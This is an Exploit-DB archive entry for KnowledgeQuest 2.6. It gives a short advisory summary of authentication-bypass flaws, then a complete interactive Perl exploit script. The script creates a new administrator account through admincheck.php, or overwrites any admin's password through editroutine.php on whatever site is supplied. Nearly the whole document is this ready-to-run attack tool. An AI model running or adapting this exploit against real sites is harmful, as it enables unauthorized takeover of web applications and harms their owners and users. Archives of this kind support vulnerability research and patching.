exploit-db-mirror/exploits/php/webapps/31719.pl

source: https://www.securityfocus.com/bid/29012/info

KnowledgeQuest is prone to multiple authentication-bypass vulnerabilities.

Attackers can leverage these issues to compromise the application, which could aid in other attacks.

KnowledgeQuest 2.6 is vulnerable; other versions may also be affected. 

 #!/usr/bin/perl
# KnowledgeBase 2.6 Remote Multiple Vulnerabilities Exploit
# Author: Cod3rZ
# http://cod3rz.helloweb.eu

use HTTP::Request::Common;
use LWP::UserAgent;

system('cls'); 
#system('clear');

$lwp = new LWP::UserAgent;

$site = $ARGV[0];
print " ---------------------------------------------------------------------\n";
print "       :: KnowledgeQuest 2.6 Multiple Vulnerabilities Exploit ::      \n";
print " ---------------------------------------------------------------------\n";
print " Author : Cod3rZ                                                      \n";
print " Site   : http://devilsnight.altervista.org                           \n";
print " Site   : http://cod3rz.helloweb.eu                                   \n";
print " ---------------------------------------------------------------------\n";

if(!$site) {
print " Usage: perl kb.pl [site]\n";
}
else {

if ($site !~ /http:\/\//) {   $site = "http://".$site; }


print " Select:                                                              \n";
print " ---------------------------------------------------------------------\n";
print " 1 - Add Admin                                                        \n";
print " 2 - Edit Admin                                                       \n";
print " ---------------------------------------------------------------------\n";
print " Your Option: ";
$choose = <STDIN>;
if($choose == 1) {
print " ---------------------------------------------------------------------\n";
print " Your Nick: ";
chomp($user = <STDIN>);
print " Your Pass: ";
chomp($pass = <STDIN>); 
$ua = $lwp->request(POST $site.'/admincheck.php',
[
username => $user,
password => $pass,
repas => $pass,
Submit => "Sign+Up"
]);
@content = $ua->content =~ /Author Registration/;
if(@content) { 
print " ---------------------------------------------------------------------\n";
print " Exploit successfully terminated - Admin created\n";
 }
else { 
print " Exploit failed\n"; 
}}
 elsif($choose == 2){ 
print " ---------------------------------------------------------------------\n";
print " Admin Nick: ";
chomp($adnick = <STDIN>);
print " New Password: ";
chomp($adpass = <STDIN>); 
$ua = $lwp->request(POST $site.'/editroutine.php',
[
tablename => "login",
key => "loginid",
num => $adnick,
action => "updateExec",
loginid => $adnick,
password => $adpass
]);
print " ---------------------------------------------------------------------\n";
print " Exploit successfully terminated                                      \n";
}
}
print " ---------------------------------------------------------------------\n";
print " Cod3rZ - http://cod3rz.helloweb.eu                                   \n";
print " ---------------------------------------------------------------------\n";